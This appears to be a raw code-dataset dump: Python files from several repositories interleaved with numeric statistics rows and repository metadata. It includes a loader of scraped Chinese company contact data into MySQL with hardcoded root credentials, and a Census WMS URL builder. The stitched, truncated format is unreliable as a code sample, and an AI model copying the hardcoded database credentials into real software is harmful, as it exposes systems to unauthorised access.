exp_header_6 = ['企业名称', '统一社会信用代码', '法定代表人', '成立日期', '注册资本', '地址', '邮箱', '电话号码', '经营范围', '网址', '电话号码(含更多号码)']
exp_header_7 = ['企业名称', '省份', '城市', '统一社会信用代码', '法定代表人', '企业类型', '成立日期', '注册资本', '地址', '邮箱', '经营范围', '网址', '电话号码(含更多号码)']
print("Connect to mysql...")
m_conn = pymysql.connect(host='192.168.70.40', port=3306, user='root', passwd='mysql', db=mysql_db, charset='utf8')
m_cursor = m_conn.cursor()
try:
file_list = os.listdir(base_path)
file_list.sort()
for i, file_name in enumerate(file_list):
file_path = os.path.join(base_path, file_name)
data = xlrd.open_workbook(file_path) # 打开xls文件
table = data.sheets()[0] # 打开第一张表
nrows = table.nrows # 获取表的行数
header = table.row_values(0) # 第一行
if header == exp_header_1:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_1"))
for j in range(nrows): # 循环逐行打印
if j == 0: # 跳过第一行
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_1(company_name, province, city, credit_code, legal_person, company_type, establishment_date, registered_capital, address, email, business_scope, site, telephone, more_telephone) VALUE ({})".format(("%s,"*len(exp_header_1))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_2:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_2"))
for j in range(nrows): # 循环逐行打印
if j == 0: # 跳过第一行
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_2(company_name, legal_person, establishment_date, registered_capital, address, email, business_scope, site) VALUE ({})".format(("%s,"*len(exp_header_2))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_3:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_3"))
for j in range(nrows): # 循环逐行打印
if j == 0: # 跳过第一行
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_3(company_name, legal_person, establishment_date, registered_capital, address, email, business_scope, site) VALUE ({})".format(("%s,"*len(exp_header_3))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_4:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_4"))
for j in range(nrows): # 循环逐行打印
if j == 0: # 跳过第一行
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_4(company_name, legal_person, establishment_date, registered_capital, address, email, telephone, business_scope, site) VALUE ({})".format(("%s,"*len(exp_header_4))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_5:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_5"))
for j in range(nrows): # 循环逐行打印
if j == 0: # 跳过第一行
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_5(company_name, credit_code, legal_person, establishment_date, registered_capital, address, email, telephone, business_scope, site) VALUE ({})".format(("%s,"*len(exp_header_5))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_6:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_6"))
for j in range(nrows): # 循环逐行打印
if j == 0: # 跳过第一行
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_6(company_name, credit_code, legal_person, establishment_date, registered_capital, address, email, telephone, business_scope, site, more_telephone) VALUE ({})".format(("%s,"*len(exp_header_6))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
elif header == exp_header_7:
print("{} {} {} {}".format(i, file_name, nrows, "exp_header_7"))
for j in range(nrows): # 循环逐行打印
if j == 0: # 跳过第一行
continue
data_list = table.row_values(j)
sql = "insert into qcc_info_7(company_name, province, city, credit_code, legal_person, company_type, establishment_date, registered_capital, address, email, business_scope, site, more_telephone) VALUE ({})".format(("%s,"*len(exp_header_7))[:-1])
m_cursor.execute(sql, data_list)
m_conn.commit()
else:
print("{} {} {} {}".format(i, file_name, nrows, "异常状况"))
raise TypeError("异常状况")
finally:
m_cursor.close()
m_conn.close()
print("MySQL connection close...")
if __name__ == '__main__':
mysql_db = "qcc_tyc_index"
base_path = "/home/nick/Desktop/数据备份/qcc_tyc_download_data/down_file/"
main()
| 51.651007 | 276 | 0.536902 | 941 | 7,696 | 4.141339 | 0.146653 | 0.096998 | 0.035925 | 0.04311 | 0.836798 | 0.831665 | 0.82525 | 0.82525 | 0.754683 | 0.735694 | 0 | 0.0157 | 0.296518 | 7,696 | 148 | 277 | 52 | 0.7041 | 0.036383 | 0 | 0.6 | 0 | 0.058333 | 0.290183 | 0.030332 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0.016667 | 0.025 | 0 | 0.041667 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2112cced3c83e351d019c48b2c79f67bc64b3eb7 | 164 | py | Python | learning.py | Derfei/huobi_tradingbot | 17d51e9b7358c1c26803caa81379f3aefd3f6a50 | [
"Apache-2.0"
] | null | null | null | learning.py | Derfei/huobi_tradingbot | 17d51e9b7358c1c26803caa81379f3aefd3f6a50 | [
"Apache-2.0"
] | null | null | null | learning.py | Derfei/huobi_tradingbot | 17d51e9b7358c1c26803caa81379f3aefd3f6a50 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
class Learning_Agent:
def __init__(self):
pass
def __load_data(self):
pass
def train(self):
pass | 13.666667 | 26 | 0.52439 | 19 | 164 | 4.105263 | 0.684211 | 0.307692 | 0.282051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009524 | 0.359756 | 164 | 12 | 27 | 13.666667 | 0.733333 | 0.128049 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.428571 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
216948d4d282a0b83f9332ad8934f404482bad50 | 214 | py | Python | pystratis/api/coldstaking/responsemodels/addressmodel.py | TjadenFroyda/pyStratis | 9cc7620d7506637f8a2b84003d931eceb36ac5f2 | [
"MIT"
] | 8 | 2021-06-30T20:44:22.000Z | 2021-12-07T14:42:22.000Z | pystratis/api/coldstaking/responsemodels/addressmodel.py | TjadenFroyda/pyStratis | 9cc7620d7506637f8a2b84003d931eceb36ac5f2 | [
"MIT"
] | 2 | 2021-07-01T11:50:18.000Z | 2022-01-25T18:39:49.000Z | pystratis/api/coldstaking/responsemodels/addressmodel.py | TjadenFroyda/pyStratis | 9cc7620d7506637f8a2b84003d931eceb36ac5f2 | [
"MIT"
] | 4 | 2021-07-01T04:36:42.000Z | 2021-09-17T10:54:19.000Z | from pystratis.api import Model
from pystratis.core.types import Address
class AddressModel(Model):
"""A pydantic model for a cold staking address."""
address: Address
"""The cold staking address."""
| 23.777778 | 54 | 0.724299 | 28 | 214 | 5.535714 | 0.571429 | 0.167742 | 0.232258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.17757 | 214 | 8 | 55 | 26.75 | 0.880682 | 0.205607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dcc4b26ad5a1e6cdfee54ab5dc27200cc65a867f | 22 | py | Python | main.py | MoYuStudio/Robot01 | 099c69dd6c80a83c1525bc57abbb1f7db04b7089 | [
"Apache-2.0"
] | null | null | null | main.py | MoYuStudio/Robot01 | 099c69dd6c80a83c1525bc57abbb1f7db04b7089 | [
"Apache-2.0"
] | null | null | null | main.py | MoYuStudio/Robot01 | 099c69dd6c80a83c1525bc57abbb1f7db04b7089 | [
"Apache-2.0"
] | null | null | null |
import pynput, time
| 5.5 | 19 | 0.727273 | 3 | 22 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 22 | 3 | 20 | 7.333333 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0d02f344811fd2a6d8cf1c6600e019cfc42d97c3 | 11,705 | py | Python | NGDAUpdater/BrowseGraphicInserter.py | mattCensus/PerlScripts | d2643d99abc3f0647ebfbd41f7e5faa704da3e91 | [
"MIT"
] | null | null | null | NGDAUpdater/BrowseGraphicInserter.py | mattCensus/PerlScripts | d2643d99abc3f0647ebfbd41f7e5faa704da3e91 | [
"MIT"
] | null | null | null | NGDAUpdater/BrowseGraphicInserter.py | mattCensus/PerlScripts | d2643d99abc3f0647ebfbd41f7e5faa704da3e91 | [
"MIT"
] | null | null | null |
import os
import fnmatch
import shutil
import re
import datetime
import time
#import StringIO
import pickle
import sys
def BrowseGraphicInserter (Theme,OutFile):
NewFile = OutFile
CurrentWMS='https://tigerweb.geo.census.gov/arcgis/rest/services/TIGERweb/tigerWMS_Current/MapServer/WmsServer?REQUEST=GetMap&SERVICE=WMS&VERSION=1.3.0'
Census2020='https://tigerweb.geo.census.gov/arcgis/rest/services/TIGERweb/tigerWMS_Census2020/MapServer?REQUEST=GetMap&SERVICE=WMS&VERSION=1.3.0'
PhysicalFeatures='https://tigerweb.geo.census.gov/arcgis/rest/services/TIGERweb/tigerWMS_PhysicalFeatures/MapServer'
Format2EPSG='&STYLES=default,default&FORMAT=image/svg+xml&BGCOLOR=0xFFFFFF&TRANSPARENT=TRUE&CRS=EPSG:4326'
WidthHeight ='&WIDTH=891&HEIGHT=751'
#& amp;
NewFile.write('<gmd:graphicOverview>\n')
NewFile.write('<gmd:MD_BrowseGraphic>\n')
NewFile.write('<gmd:fileName>\n')
if re.search('State Legislative District (SLD) Upper Chamber',Theme,flags=0):
GraphicURL='<gco:CharacterString>'+ CurrentWMS +'&LAYERS= 2018 State Legislative Districts - Upper, 2018 State Legislative Districts - Upper Labels'+Format2EPSG + 'BBOX=42.299053,-71.408142,42.35679,-70.798861'+WidthHeight +'</gco:CharacterString>'
NewFile.write (GraphicURL)
elif re.search('State and Equivalent',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS= States, States Labels' + Format2EPSG + 'BBOX=32.860571,-113.5097542,46.389131,-113.509754' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('SubMinor Civil Division',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS= Subbarrios,Subbarrios Labels,Counties,Counties ' + Format2EPSG + 'BBOX=18.4271,-66.0859,18.4618,-66.0430' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Census Block',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS= 2020 Census Blocks,2020 Census Blocks Labels' + Format2EPSG + 'BBOX=42.499053,-71.897142,42.52679,-71.889999' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Census Block', Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS= 2020 Census Blocks,2020 Census Blocks Labels' + Format2EPSG + 'BBOX=42.499053,-71.897142,42.52679,-71.889999' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Census Tract',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Census Tracts,Census Tracts' + Format2EPSG + 'BBOX=41.187053,-72.508142,42.88679,-69.858861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Urban Growth Area (UGA)',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + Census2020 + '&LAYERS=Urban Growth Areas,Urban Growth Areas Labels' + Format2EPSG + 'BBOX=42.006078,-124.520539,49.002494,-116.935343' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('AIANNH',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Off-Reservation Trust Lands,Off-Reservation Trust Lands Labels,State American Indian Reservations,State American Indian Reservations Labels,Hawaiian Home Lands,Hawaiian Home Lands Labels,Alaska Native Village Statistical Areas,Alaska Native Village Statistical Areas Labels,Federal American Indian Reservations,Federal American Indian Reservations Labels,Tribal Subdivisions,Tribal Subdivisions Labels,Oklahoma Tribal Statistical Areas,Oklahoma Tribal Statistical Areas Labels' + Format2EPSG + 'BBOX=+31.7134386,-112.0355607,+32.17347503,-111.640779' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('AITS',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Off-Reservation Trust Lands,Off-Reservation Trust Lands Labels,State American Indian Reservations,State American Indian Reservations Labels,Hawaiian Home Lands,Hawaiian Home Lands Labels,Alaska Native Village Statistical Areas,Alaska Native Village Statistical Areas Labels,Federal American Indian Reservations,Federal American Indian Reservations Labels,Tribal Subdivisions,Tribal Subdivisions Labels,Oklahoma Tribal Statistical Areas,Oklahoma Tribal Statistical Areas Labels' + Format2EPSG + 'BBOX=+31.7134386,-112.0355607,+32.17347503,-111.640779' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search (' Block Group',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Census Block Groups,Census Block Groups Labels' + Format2EPSG + 'BBOX=+42.389053,-71.907142,42.52679,-71.879999' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('116th Congressional District',Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=116th Congressional Districts,116th Congressional Districts Labels' + Format2EPSG + 'BBOX=+32.860571,-113.5097542,46.389131,-113.509754' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
#116th Congressional Districts Consolidated City Consolidated Cities
elif re.search('Consolidated City', Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Consolidated Cities,Consolidated Cities Labels' + Format2EPSG + 'BBOX=+41.1581676,-073.1316819,+41.2909526,-072.97466503' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Census County and Equivalent',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS Counties, Counties Labels' + Format2EPSG + 'BBOX=41.187053,-73.508142,42.88679,-69.858861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('County Subdivision',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS County Subdivisions,County Subdivisions Labels' + Format2EPSG + 'BBOX=43.628449,-71.934903,43.706635,-71.346863' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search(' Elementary School District',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS Elementary School Districts,Elementary School Districts Labels' + Format2EPSG + 'BBOX=+41.3255598,-073.0942359,+41.4663967,-072.8549872' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Census Place',Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS Census Designated Places,Census Designated Places Labels,Incorporated Places,Incorporated Places Labels' + Format2EPSG + 'BBOX=+42.299053,-71.408142,42.35679,-70.798861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Current Place',Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS Census Designated Places,Census Designated Places Labels,Incorporated Places,Incorporated Places Labels' + Format2EPSG + 'BBOX=+42.299053,-71.408142,42.35679,-70.798861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search ('Census Secondary School District',Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS Secondary School Districts,Secondary School Districts Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Current Secondary School Districts', Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS Secondary School Districts,Secondary School Districts Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('State Legislative District (SLD) Lower Chamber',Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS 2018 State Legislative Districts - Lower,2018 State Legislative Districts - Lower Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('(SLD)Lower Chamber',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS 2018 State Legislative Districts - Lower,2018 State Legislative Districts - Lower Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('UGA',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + Census2020 + '&LAYERS Urban Growth Areas, Urban Growth Areas Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Unified School Districts',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS Unified School Districts,Unified School Districts Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('All Roads',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + PhysicalFeatures + '&LAYERS Primary Roads,Primary Roads Labels, Secondary Roads, Secondary Roads Labels, Local Roads, Local Roads Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Places',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS Census Designated Places,Census Designated Places Labels,Incorporated Places,Incorporated Places Labels' + Format2EPSG + 'BBOX=42.299053,-71.408142,42.35679,-70.798861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
#Census Designated Places,Census Designated Places Labels,Incorporated Places,Incorporated Places Labels
elif re.search('PUMA',Theme, flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS 2010 Census Public Use Microdata Areas,2010 Census Public Use Microdata Areas ' + Format2EPSG + 'BBOX=42.1993,-71.4805,42.6317,-70.7939' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('(SLD) Upper Chamber State',Theme,flags=0):
GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS 2018 State Legislative Districts - Upper, 2018 State Legislative Districts - Upper Labels' + Format2EPSG + 'BBOX=42.1993,-71.4805,42.6317,-70.7939' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
else:
NewFile.write('<gco:CharacterString> Unable to determine the Theme' + Theme + 'for the Browse Graphic </gco:CharacterString>')
NewFile.write('</gmd:fileName>\n')
NewFile.write('</gmd:MD_BrowseGraphic>\n')
NewFile.write('</gmd:graphicOverview>\n') | 95.942623 | 665 | 0.729346 | 1,329 | 11,705 | 6.419865 | 0.173815 | 0.118143 | 0.082044 | 0.098453 | 0.821378 | 0.808017 | 0.789381 | 0.789381 | 0.789381 | 0.738631 | 0 | 0.124888 | 0.139428 | 11,705 | 122 | 666 | 95.942623 | 0.722128 | 0.01666 | 0 | 0.375 | 0 | 0.067308 | 0.596135 | 0.272112 | 0 | 0 | 0.000703 | 0 | 0 | 1 | 0.009615 | false | 0 | 0.076923 | 0 | 0.086538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0d406276a5762d8d397797ee6512af1cca719e34 | 30 | py | Python | pyOSA/Old-2021-04-09/__init__.py | gregmoille/InstrumentControl | 4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133 | [
"MIT"
] | 3 | 2018-05-02T20:14:15.000Z | 2020-10-18T03:57:09.000Z | pyOSA/.ipynb_checkpoints/__init__-checkpoint.py | gregmoille/InstrumentControl | 4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133 | [
"MIT"
] | 1 | 2019-05-23T15:21:08.000Z | 2019-05-23T15:21:08.000Z | pyOSA/.ipynb_checkpoints/__init__-checkpoint.py | gregmoille/InstrumentControl | 4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133 | [
"MIT"
] | 2 | 2019-05-16T20:36:25.000Z | 2020-09-22T18:26:49.000Z | from .yokogawa import Yokogawa | 30 | 30 | 0.866667 | 4 | 30 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 30 | 1 | 30 | 30 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b4bc99ea83c9b578e4c6cdb222591a18012b5825 | 40 | py | Python | tests/interactions/conftest.py | CSI-BennettUniversity/Sample-Project-1 | 23197352372b7ad00a026683477b5a95a4178e35 | [
"MIT"
] | 5 | 2020-07-30T16:47:30.000Z | 2021-02-15T16:44:59.000Z | tests/interactions/conftest.py | CSI-BennettUniversity/Sample-Project-1 | 23197352372b7ad00a026683477b5a95a4178e35 | [
"MIT"
] | 4 | 2021-06-04T23:42:41.000Z | 2021-09-11T03:17:12.000Z | tests/interactions/conftest.py | CSI-BennettUniversity/Sample-Project-1 | 23197352372b7ad00a026683477b5a95a4178e35 | [
"MIT"
] | 7 | 2020-07-05T14:29:17.000Z | 2021-06-05T14:34:20.000Z | import csv
import random
import pytest
| 8 | 13 | 0.825 | 6 | 40 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175 | 40 | 4 | 14 | 10 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
371e0a181c5ce1e7346dcfa35a8bf08e2f55df00 | 20 | py | Python | openbu/__init__.py | bam241/ONIX | 021c9da664eb4b85ede1c0993555341b87011c29 | [
"MIT"
] | null | null | null | openbu/__init__.py | bam241/ONIX | 021c9da664eb4b85ede1c0993555341b87011c29 | [
"MIT"
] | null | null | null | openbu/__init__.py | bam241/ONIX | 021c9da664eb4b85ede1c0993555341b87011c29 | [
"MIT"
] | null | null | null | from . import couple | 20 | 20 | 0.8 | 3 | 20 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 20 | 1 | 20 | 20 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2eb11e5be56f0c8dd0bed3433ba7747ed2dfe190 | 252 | py | Python | resources/models.py | meynmd/mmdetection | 0064c4a1dd656cc96cdac05050dbb4db0fce54b5 | [
"Apache-2.0"
] | null | null | null | resources/models.py | meynmd/mmdetection | 0064c4a1dd656cc96cdac05050dbb4db0fce54b5 | [
"Apache-2.0"
] | null | null | null | resources/models.py | meynmd/mmdetection | 0064c4a1dd656cc96cdac05050dbb4db0fce54b5 | [
"Apache-2.0"
] | null | null | null | MODELS = {
'cascade_rcnn': {
'config': 'configs/cascade_rcnn/cascade_rcnn_x101_64x4d_fpn_20e_coco.py',
'checkpoint': 'pretrained/cascade_rcnn_x101_64x4d_fpn/cascade_rcnn_x101_64x4d_fpn_20e_coco_20200509_224357-051557b1.pth'
}
}
| 36 | 128 | 0.757937 | 33 | 252 | 5.181818 | 0.515152 | 0.321637 | 0.263158 | 0.350877 | 0.48538 | 0.350877 | 0.350877 | 0 | 0 | 0 | 0 | 0.198157 | 0.138889 | 252 | 6 | 129 | 42 | 0.589862 | 0 | 0 | 0 | 0 | 0 | 0.761905 | 0.650794 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2ec1934efa9445e043b13e9d7fe8270050d7edf2 | 19 | py | Python | afbmq/__init__.py | JMarkin/afbmq | 8491abfdd17e2ab745b5150eafdaf68a0f3cd1d0 | [
"MIT"
] | null | null | null | afbmq/__init__.py | JMarkin/afbmq | 8491abfdd17e2ab745b5150eafdaf68a0f3cd1d0 | [
"MIT"
] | null | null | null | afbmq/__init__.py | JMarkin/afbmq | 8491abfdd17e2ab745b5150eafdaf68a0f3cd1d0 | [
"MIT"
] | null | null | null | from .fb import FB
| 9.5 | 18 | 0.736842 | 4 | 19 | 3.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 19 | 1 | 19 | 19 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2ec7ab672d93f39da4e52af99693f8a34f76f285 | 68 | py | Python | src/tests/__init__.py | rschwa6308/Physics-2.0 | 40775d41304262807d86b5984db55dff45b3edfc | [
"MIT"
] | 7 | 2017-03-31T15:48:00.000Z | 2019-06-29T17:46:56.000Z | src/tests/__init__.py | rschwa6308/Physics-2.0 | 40775d41304262807d86b5984db55dff45b3edfc | [
"MIT"
] | 12 | 2017-04-03T23:35:57.000Z | 2019-01-23T00:38:03.000Z | src/tests/__init__.py | rschwa6308/Physics-2.0 | 40775d41304262807d86b5984db55dff45b3edfc | [
"MIT"
] | 3 | 2017-03-31T20:57:25.000Z | 2019-10-24T16:12:27.000Z | from .tests import *
def run_all_tests():
test_body_movement()
